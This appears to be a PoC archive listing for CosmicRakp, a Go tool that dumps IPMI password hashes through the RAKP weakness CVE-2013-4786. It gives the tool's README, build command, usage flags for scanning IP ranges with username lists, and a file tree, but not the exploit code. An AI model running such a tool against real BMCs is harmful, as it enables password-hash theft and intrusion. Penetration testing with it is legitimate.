Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2013-4786 PoC — Intelligent Platform Management Interface 信任管理问题漏洞

Source
https://github.com/fin3ss3g0d/CosmicRakp
Associated Vulnerability
Title:Intelligent Platform Management Interface 信任管理问题漏洞 (CVE-2013-4786)
Description:The IPMI 2.0 specification supports RMCP+ Authenticated Key-Exchange Protocol (RAKP) authentication, which allows remote attackers to obtain password hashes and conduct offline password guessing attacks by obtaining the HMAC from a RAKP message 2 response from a BMC.
Description
CVE-2013-4786 Go exploitation tool
Readme
# CosmicRakp

![Thanos Image](./thanos.jpg)

## Table of Contents

- [Introduction](#introduction)
- [CVE-2013-4786](#cve-2013-4786)
- [Installation](#installation)
- [Usage](#usage)
- [Credits](#credits)
- [License](#license)

## Introduction

CosmicRakp is a powerful tool written in Go that allows red teamers and penetration testers to dump IPMI hashes. This project aims to be efficient, fast, and easy to use.

## CVE-2013-4786

This tool exploits the vulnerability detailed in CVE-2013-4786, which allows unauthorized users to retrieve salted password hashes from IPMI devices via the RAKP (Remote Authentication Key Protocol) mechanism. This is achieved by initiating an IPMI 2.0 RAKP authentication process with a cipher suite that enables 'None' authentication, allowing the retrieval of salted password hashes.

## Installation

```bash
./build.sh
```

## Usage

```go
❯ ./cosmicrakp -h
Usage of ./cosmicrakp:
  -debug
    	enable debug mode
  -max-attempts int
    	maximum number of attempts to open a session (default 3)
  -mode string
    	mode of operation: 'range' or 'file' (default "range")
  -output string
    	File to store output results (default "output.txt")
  -range string
    	IP range for 'range' mode
  -retry-delay duration
    	time to wait between retries (in seconds) (default 2s)
  -targets string
    	target file for 'file' mode
  -threads int
    	number of threads for concurrent execution (default 4)
  -usernames string
    	File containing usernames to test (default "users.txt")
```


### Credits

This project is inspired by and pays homage to one of the original (if not the original) proof-of-concept for exploiting CVE-2013-4786. The PoC was developed by Dan Farmer and is a part of the Metasploit Framework. You can find the original code [here](https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ipmi/ipmi_dumphashes.rb).

### License

This project uses the MIT license.
File Snapshot

 [4.0K]  /data/pocs/ebd2ef133a56ba8f68fe74537d0a1d70362326af
├── [  65]  build.sh
├── [4.0K]  ipmi
│   └── [ 11K]  ipmi.go
├── [1.0K]  LICENSE
├── [7.6K]  main.go
├── [1.9K]  README.md
├── [194K]  thanos.jpg
├── [  50]  users.txt
└── [4.0K]  util
    └── [2.2K]  util.go

2 directories, 8 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →